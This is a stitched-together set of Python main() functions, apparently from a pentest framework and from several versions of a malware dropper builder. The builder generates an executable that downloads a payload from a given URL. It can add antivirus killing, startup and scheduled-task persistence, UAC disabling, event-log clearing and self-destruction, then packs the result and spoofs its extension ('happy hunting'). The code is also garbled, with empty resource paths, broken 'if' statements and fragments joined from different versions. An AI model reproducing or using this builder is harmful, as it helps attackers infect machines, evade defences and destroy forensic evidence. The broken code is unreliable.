def main(): """Main function to run.""" firstRun() if args.add: cmodules.addModule(args.add) print('\n\n') return None if args.delete: cmodules.removeModule(args.delete) print('\n\n') return None if args.module: runModule() return None if not args.nocheck: print('\n\t' + bc.OKBLUE + 'CHECKING REQUIREMENTS' + bc.ENDC) timeSinceUpdate() comm.checkNetConnectionV() comm.getPublicIPV() comm.getLocalIP_interfaceV() comm.checkNetVPNV() comm.checkTorV() sleep(1.5) if args.www: banner() print('\tVisit') cwww.startWWW() return None if not args.quite: print(bc.WARN) welcome() else: print('') if os.getuid() != 0: print(' ' + bc.WARN + '[!] You are not running WMDframe as root. You\'ll might encounter some problems.. You have been warned!\n') path = currPath() console(path)
def welcome(): """Welcome message.""" banner() showCommands()
def main(): prepare_folder("temp") prepare_folder("output") clear() if args.u: updater.check() sys.exit(0) if not args.u: if not args.url: print(parser.print_help()) x = sys.exit(0) if not args.q: banner() if == "nt": installer = "pyinstaller" exe = "" else: if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/ installer = "wine " + os.environ[ 'HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ[ 'HOME'] + "/.wine/drive_c/Python27/Scripts/" else: # TODO: find all defaults location for .wine , or request it directely to the user if not found. installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/" exe = "wine " url = args.url p = "resources" fullp = os.getcwd() command = installer + " --noconsole -F --noupx {} " bat_path = ["scripts", "bat"] ps1_path = ["scripts", "powershell"] vbs_path = ["scripts", "vbs"] f = "" print_status(args) colored_print(" [*] Creating DR0P3R..", "g") f += "#!/usr/bin/python\n" f += "# -*- coding: iso-8859-15 -*-\n" f += 'import subprocess\n' f += get_code(os.path.join(p, "")) + "\n" #this functions for : #get_output(cmd): to get output of command without using pipe to escape the fatal error after compiling !! if args.k: if not args.nd: colored_print(" [*] Adding kill antivirus function..", "g") f += get_code(os.path.join(p, "")) + "\n" if sys.version_info[0] == 3: f += '\nfrom urllib.request import urlopen' elif sys.version_info[0] == 2: f += '\nfrom urllib import urlopen' if "http" not in url: url = "http://" + url if args.only32: if f += get_code(os.path.join(p, "")).replace( "##~Import-Here~##", "import zipfile").split("#Someshit")[0] + "\n" f += '\nfire_things_up("{}","32",True)\n'.format(url) else: f += get_code(os.path.join(p, "")).split("#Someshit")[0] f += '\nfire_things_up("{}","32")\n'.format(url) elif args.only64: if f += get_code(os.path.join(p, "")).replace( "##~Import-Here~##", "import zipfile").split("#Someshit")[0] + "\n" f += '\nfire_things_up("{}","64",True)\n'.format(url) else: f += get_code(os.path.join(p, "")).split("#Someshit")[0] f += '\nfire_things_up("{}","64")\n'.format(url) elif not args.only32 or not args.only64: if f += get_code(os.path.join(p, "")).replace( "##~Import-Here~##", "import zipfile").split("#Someshit")[0] + "\n" f += '\nfire_things_up("{}",False,True)\n'.format(url) else: f += get_code(os.path.join(p, "")).split("#Someshit")[0] f += '\nfire_things_up("{}")\n'.format(url) if args.runas: f += get_code(os.path.join(p, "")) else: f += get_code(os.path.join(p, "")).split("#Someshit")[1] if args.s: if not args.nd: colored_print(" [*] Adding startup function..", "g") if "File = 'library.exe'" not in f: f += "\nFile = 'library.exe'" f += get_code(os.path.join(p, "")) + "\n" if args.t: if not args.nd: colored_print(" [*] Adding task function..", "g") if "File = 'library.exe'" not in f: f += "\nFile = 'library.exe'" f += get_code(os.path.join(p, "")) + "\n" if args.a: if not args.nd: colored_print(" [*] Adding add2profile function..", "g") if "File = 'library.exe'" not in f: f += "\nFile = 'library.exe'\n" f += "\nlink='{}'".format(url) f += get_code(os.path.join(p, "")) + "\n" if args.b: try: if not args.nd: colored_print(" [*] Adding runbat function..", "g") bat_path.append(args.b) ff = open(os.path.join(*bat_path)).read() f += "\nBat_Script_Data = '''{}'''".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?", "r") if args.p: try: if not args.nd: colored_print(" [*] Adding runps1 function..", "g") ps1_path.append(args.p) ff = open(os.path.join(*ps1_path)).read() f += "\nPs1_Script_Data = '''{}'''".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?", "r") if args.v: try: if not args.nd: colored_print(" [*] Adding runvbs function..", "g") vbs_path.append(args.v) ff = open(os.path.join(*vbs_path)).read() f += "\nVbs_Script_Data = '''{}'''".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?", "r") if args.nouac: if not args.nd: colored_print(" [*] Adding disable UAC function..", "g") f += get_code(os.path.join(p, "")) + "\n" colored_print(" [*] Adding self destruct function..", "g") f += get_code(os.path.join(p, "")) + "\n" if not args.noclearevent: colored_print(" [*] Adding clear eventlog function..", "g") f += get_code(os.path.join(p, "")) + "\n" colored_print(" [*] Saving the final file..", "g") file_name = random_name() f += "\nx = subprocess.Popen( 'del out >> NUL',creationflags=subprocess.CREATE_NEW_CONSOLE, shell=True)" os.chdir("temp") fo = open(file_name + ".py", "w") fo.write(f) fo.close() if not args.nocompile: if PyInstaller(): colored_print(" [*] Compiling the final file to exe..", "g") if args.i: if os.path.isfile(os.path.join(fullp, "icons", args.i)): if not args.nd: colored_print(" [*] Adding icon to the final file..", "g") command += "--icon=" + os.path.join(fullp, "icons", args.i) else: colored_print( " [!] Error in icon file,are you sure it's in icons folder ?", "r") p = subprocess.Popen(command.format(file_name + ".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, err) = p.communicate() debug = output.decode() + "\n" + err.decode() pw = p.wait() if "Traceback" in debug: f = open("debug.txt", "w") f.write(debug) f.close() colored_print( " [!] Error in compiling file [ See debug.txt file in temp folder ! ]", "r") sys.exit(0) file_name = get_executable() if args.upx: if not args.nd: colored_print(" [*] Compressing the final file..", "g") x = subprocess.Popen(exe + os.path.join("utils", "upx.exe") + " -9 " + os.path.join("output", file_name), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) os.chdir("..") make_copy(os.path.join("temp", "dist", file_name), os.path.join("output", file_name)) if args.spoof: if not args.nd: colored_print(" [*] Spoofing the final file extension..", "g") if Spoof_extension(os.path.join("output", file_name), args.spoof): colored_print(" [*] File extension spoof complate !", "g") else: colored_print(" [!] File extension spoof failed !", "r") else: colored_print( " [!] PyInstaller not installed : Can't compile file to exe..", "r") elif args.nocompile: file_name = file_name + ".py" os.chdir("..") blah = os.rename(os.path.join("temp", file_name), os.path.join("output", file_name)) colored_print( " [*] Finished and saved our Dr0pp3r as " + file_name + " in output folder ( happy hunting )", "m")
from core.banners import banner from import menu banner() menu()
def main(): x = shutil.rmtree("temp", ignore_errors=True) xx = os.mkdir("temp") x = shutil.rmtree("output", ignore_errors=True) xx = os.mkdir("output") #clear() if args.u: updater.check() sys.exit(0) if not args.u: if not args.url: print(parser.print_help()) x = sys.exit(0) if not args.q: banner() url = args.url command = "pyinstaller --noconsole -F {} " p = "resources" bat_path = ["scripts", "bat"] ps1_path = ["scripts", "powershell"] vbs_path = ["scripts", "vbs"] f = "" print_status(args) colored_print(" [*] Creating DR0P3R..", "g") if args.s: if not args.nd: colored_print(" [*] Adding startup function..", "g") f += "\nFile = 'hosts.exe'\n" f += "\n" + get_code(os.path.join(p, "")) if args.t: if not args.nd: colored_print(" [*] Adding task function..", "g") f += "\nFile = 'hosts.exe'\n" f += "\n" + get_code(os.path.join(p, "")) if args.k: if not args.nd: colored_print(" [*] Adding kill antivirus function..", "g") f += "\n" + get_code(os.path.join(p, "")) if args.b: try: if not args.nd: colored_print(" [*] Adding runbat function..", "g") bat_path.append(args.b) ff = open(os.path.join(*bat_path)).read() f += "\nBat_Script_Data = '''{}'''\n".format(ff) f += "\n" + get_code(os.path.join(p, "")) except Exception as e: print(e) colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?", "r") if args.p: try: if not args.nd: colored_print(" [*] Adding runps1 function..", "g") ps1_path.append(args.p) ff = open(os.path.join(*ps1_path)).read() f += "\nPs1_Script_Data = '''{}'''\n".format(ff) f += "\n" + get_code(os.path.join(p, "")) except: colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?", "r") if args.v: try: if not args.nd: colored_print(" [*] Adding runvbs function..", "g") vbs_path.append(args.v) ff = open(os.path.join(*vbs_path)).read() f += "\nVbs_Script_Data = '''{}'''\n".format(ff) f += "\n" + get_code(os.path.join(p, "")) except: colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?", "r") if args.i: try: if not args.nd: colored_print(" [*] Adding icon to the final file..", "g") ff = open(args.i).read() command += "--icon=" + args.i except: colored_print( " [!] Error in icon file so I will use the default one", "r") if args.only32: f += '\nfire_things_up("{}",arch="32")\n'.format(url) elif args.only64: f += '\nfire_things_up("{}",arch="64")\n'.format(url) elif not args.only32 or not args.only64: f += '\nfire_things_up("{}")\n'.format(url) f += "\n" + get_code(os.path.join(p, "")) colored_print(" [*] Compiling the final file to exe..", "g") file_name = random_name() os.chdir("temp") fo = open(file_name + ".py", "w") fo.write(f) fo.close() try: p = subprocess.Popen(command.format(file_name + ".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) (output, err) = p.communicate() pw = p.wait() except Exception as e: print(e) colored_print( " [!] Error in compiling file,are you sure pyinstaller is installed ?", "r") sys.exit(0) os.chdir("..") if == "nt": file_name = file_name + ".exe" make_copy(os.path.join("temp", "dist", file_name), os.path.join("output", file_name)) if args.upx: if not args.nd: colored_print(" [*] Compressing the final file..", "g") x = subprocess.Popen(os.path.join("utils", "upx.exe") + " -9 " + os.path.join("output", file_name), shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) colored_print( " [*] Finished and saved our Dr0pp3r as " + file_name + ".exe in output folder ( happy hunting )", "m")
def main(): prepare_folder("temp") prepare_folder("output") clear() if args.u: updater.check() sys.exit(0) if not args.u: if not args.url: print(parser.print_help()) x = sys.exit(0) if not args.q: banner() if == "nt": installer = "pyinstaller" exe = "" else: installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/" exe = "wine " url = args.url p = "resources" fullp = os.getcwd() command = installer + " -F --noupx {} " bat_path = ["scripts", "bat"] ps1_path = ["scripts", "powershell"] vbs_path = ["scripts", "vbs"] f = "" print_status(args) colored_print(" [*] Creating DR0P3R..", "g") f += 'import subprocess\n' if args.k: if not args.nd: colored_print(" [*] Adding kill antivirus function..", "g") f += get_code(os.path.join(p, "")) + "\n" if sys.version_info[0] == 3: f += 'from urllib.request import urlretrieve\n' elif sys.version_info[0] == 2: f += 'from urllib import urlretrieve\n' f += get_code(os.path.join(p, "")) + "\n" if "http" not in url: url = "http://" + url if args.only32: f += 'fire_things_up("{}",arch="32")\n'.format(url) elif args.only64: f += 'fire_things_up("{}",arch="64")\n'.format(url) elif not args.only32 or not args.only64: f += 'fire_things_up("{}")\n'.format(url) if args.s: if not args.nd: colored_print(" [*] Adding startup function..", "g") if "from random import randint" not in f: f += "from random import randint\n" if "File = 'hosts.exe'" not in f: f += "File = 'hosts.exe'\n" f += get_code(os.path.join(p, "")) + "\n" if args.t: if not args.nd: colored_print(" [*] Adding task function..", "g") if "from random import randint" not in f: f += "from random import randint\n" if "File = 'hosts.exe'" not in f: f += "File = 'hosts.exe'\n" f += get_code(os.path.join(p, "")) + "\n" if args.b: try: if not args.nd: colored_print(" [*] Adding runbat function..", "g") bat_path.append(args.b) ff = open(os.path.join(*bat_path)).read() f += "Bat_Script_Data = '''{}'''\n".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?", "r") if args.p: try: if not args.nd: colored_print(" [*] Adding runps1 function..", "g") ps1_path.append(args.p) ff = open(os.path.join(*ps1_path)).read() f += "Ps1_Script_Data = '''{}'''\n".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?", "r") if args.v: try: if not args.nd: colored_print(" [*] Adding runvbs function..", "g") vbs_path.append(args.v) ff = open(os.path.join(*vbs_path)).read() f += "Vbs_Script_Data = '''{}'''\n".format(ff) f += get_code(os.path.join(p, "")) + "\n" except: colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?", "r") if args.nouac: if not args.nd: colored_print(" [*] Adding disable UAC function..", "g") f += get_code(os.path.join(p, "")) + "\n" colored_print(" [*] Adding self destruct function..", "g") f += get_code(os.path.join(p, "")) + "\n" colored_print(" [*] Saving the final file..", "g") file_name = random_name() os.chdir("temp") fo = open(file_name + ".py", "w") fo.write(f) fo.close() if not args.nocompile: if PyInstaller(): colored_print(" [*] Compiling the final file to exe..", "g") if args.i: try: if not args.nd: colored_print(" [*] Adding icon to the final file..", "g") ff = open(os.path.join(fullp, "icons", args.i)).read() command += "--icon=" + os.path.join(fullp, "icons", args.i) except: colored_print( " [!] Error in icon file,are you sure it's in icons folder ?", "r") try: p = subprocess.Popen(command.format(file_name + ".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, err) = p.communicate() pw = p.wait() except: colored_print( " [!] Error in compiling file,are you sure pyinstaller is installed ?", "r") sys.exit(0) file_name = get_executable() if args.upx: if not args.nd: colored_print(" [*] Compressing the final file..", "g") x = subprocess.Popen(exe + os.path.join("utils", "upx.exe") + " -9 " + os.path.join("output", file_name), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) os.chdir("..") make_copy(os.path.join("temp", "dist", file_name), os.path.join("output", file_name)) else: colored_print( " [!] PyInstaller not installed : Can't compile file to exe..", "r") elif args.nocompile: file_name = file_name + ".py" os.chdir("..") blah = os.rename(os.path.join("temp", file_name), os.path.join("output", file_name)) colored_print( " [*] Finished and saved our Dr0pp3r as " + file_name + " in output folder ( happy hunting )", "m")
def main(): prepare_folder("temp") prepare_folder("output") clear() if args.u: updater.check() sys.exit(0) if not args.u: if not args.url: print( parser.print_help() ) x=sys.exit(0) if not args.q: banner() if"nt": installer = "pyinstaller" exe = "" else: if sys.platform == "darwin": # On osx, the default .wine directory is located on $HOME/.wine/ installer = "wine " + os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe " + os.environ['HOME'] + "/.wine/drive_c/Python27/Scripts/" else: # TODO: find all defaults location for .wine , or request it directely to the user if not found. installer = "wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/" exe = "wine " url = args.url p = "resources" fullp = os.getcwd() command = installer +" --noconsole -F --noupx {} " bat_path = ["scripts","bat"] ps1_path = ["scripts","powershell"] vbs_path = ["scripts","vbs"] f = "" print_status(args) colored_print( " [*] Creating DR0P3R..","g" ) f += "#!/usr/bin/python\n" f += "# -*- coding: iso-8859-15 -*-\n" f += 'import subprocess\n' f += get_code( os.path.join(p,"") )+"\n" #this functions for : #get_output(cmd): to get output of command without using pipe to escape the fatal error after compiling !! if args.k: if not args.nd: colored_print( " [*] Adding kill antivirus function..","g" ) f += get_code( os.path.join(p,"") )+"\n" if sys.version_info[0]==3: f += '\nfrom urllib.request import urlretrieve' elif sys.version_info[0]==2: f += '\nfrom urllib import urlretrieve' if "http" not in url: url = "http://"+url if args.only32: if f += get_code( os.path.join(p,"") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n" f += '\nfire_things_up("{}","32",True)\n'.format( url ) else: f += get_code( os.path.join(p,"") ).split("#Someshit")[0] f += '\nfire_things_up("{}","32")\n'.format( url ) elif args.only64: if f += get_code( os.path.join(p,"") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n" f += '\nfire_things_up("{}","64",True)\n'.format( url ) else: f += get_code( os.path.join(p,"") ).split("#Someshit")[0] f += '\nfire_things_up("{}","64")\n'.format( url ) elif not args.only32 or not args.only64: if f += get_code( os.path.join(p,"") ).replace("##~Import-Here~##","import zipfile").split("#Someshit")[0]+"\n" f += '\nfire_things_up("{}",False,True)\n'.format( url ) else: f += get_code( os.path.join(p,"") ).split("#Someshit")[0] f += '\nfire_things_up("{}")\n'.format( url ) if args.runas: f += get_code( os.path.join(p,"") ) else: f += get_code( os.path.join(p,"") ).split("#Someshit")[1] if args.s: if not args.nd: colored_print( " [*] Adding startup function..","g" ) if "File = 'library.exe'" not in f: f+="\nFile = 'library.exe'" f += get_code( os.path.join(p,"") )+"\n" if args.t: if not args.nd: colored_print( " [*] Adding task function..","g" ) if "File = 'library.exe'" not in f: f+="\nFile = 'library.exe'" f += get_code( os.path.join(p,"") )+"\n" if args.a: if not args.nd: colored_print( " [*] Adding add2profile function..","g" ) if "File = 'library.exe'" not in f: f+="\nFile = 'library.exe'\n" f += "\nlink='{}'".format(url) f += get_code( os.path.join(p,"") )+"\n" if args.b: try : if not args.nd: colored_print( " [*] Adding runbat function..","g" ) bat_path.append(args.b) ff = open( os.path.join(*bat_path ) ).read() f += "\nBat_Script_Data = '''{}'''".format( ff ) f += get_code( os.path.join(p,"") )+"\n" except: colored_print( " [!] Error in reading bat file,are you sure it's in scripts folder ?","r" ) if args.p: try : if not args.nd: colored_print( " [*] Adding runps1 function..","g" ) ps1_path.append(args.p) ff = open( os.path.join(*ps1_path ) ).read() f += "\nPs1_Script_Data = '''{}'''".format( ff ) f += get_code( os.path.join(p,"") )+"\n" except : colored_print( " [!] Error in reading ps1 file,are you sure it's in scripts folder ?","r" ) if args.v: try : if not args.nd: colored_print( " [*] Adding runvbs function..","g" ) vbs_path.append(args.v) ff = open( os.path.join(*vbs_path ) ).read() f += "\nVbs_Script_Data = '''{}'''".format( ff ) f += get_code( os.path.join(p,"") )+"\n" except : colored_print( " [!] Error in reading vbs file,are you sure it's in scripts folder ?","r" ) if args.nouac: if not args.nd: colored_print( " [*] Adding disable UAC function..","g" ) f += get_code( os.path.join(p,"") )+"\n" colored_print( " [*] Adding self destruct function..","g" ) f += get_code( os.path.join(p,"") )+"\n" if not args.noclearevent: colored_print( " [*] Adding clear eventlog function..","g" ) f += get_code( os.path.join(p,"") )+"\n" colored_print( " [*] Saving the final file..","g" ) file_name = random_name() os.chdir("temp") fo = open( file_name+".py","w" ) fo.write(f) fo.close() if not args.nocompile: if PyInstaller(): colored_print( " [*] Compiling the final file to exe..","g" ) if args.i: if os.path.isfile( os.path.join(fullp,"icons",args.i) ): if not args.nd: colored_print( " [*] Adding icon to the final file..","g" ) command += "--icon=" + os.path.join(fullp,"icons",args.i) else: colored_print( " [!] Error in icon file,are you sure it's in icons folder ?","r" ) p = subprocess.Popen( command.format(file_name+".py"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, err) = p.communicate() debug = output.decode() + "\n" + err.decode() pw = p.wait() if "Traceback" in debug: f=open("debug.txt","w") f.write(debug) f.close() colored_print( " [!] Error in compiling file [ See debug.txt file in temp folder ! ]","r" ) sys.exit(0) file_name = get_executable() if args.upx: if not args.nd: colored_print( " [*] Compressing the final file..","g" ) x = subprocess.Popen(exe + os.path.join("utils","upx.exe") +" -9 "+os.path.join("output",file_name) ,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) os.chdir("..") make_copy( os.path.join("temp","dist",file_name),os.path.join("output",file_name) ) if args.spoof: if not args.nd: colored_print( " [*] Spoofing the final file extension..","g" ) if Spoof_extension(os.path.join("output",file_name),args.spoof): colored_print( " [*] File extension spoof complate !","g" ) else: colored_print( " [!] File extension spoof failed !","r" ) else: colored_print( " [!] PyInstaller not installed : Can't compile file to exe..","r" ) elif args.nocompile: file_name = file_name+".py" os.chdir("..") blah = os.rename( os.path.join( "temp",file_name ),os.path.join( "output",file_name ) ) colored_print( " [*] Finished and saved our Dr0pp3r as "+file_name+" in output folder ( happy hunting )","m" )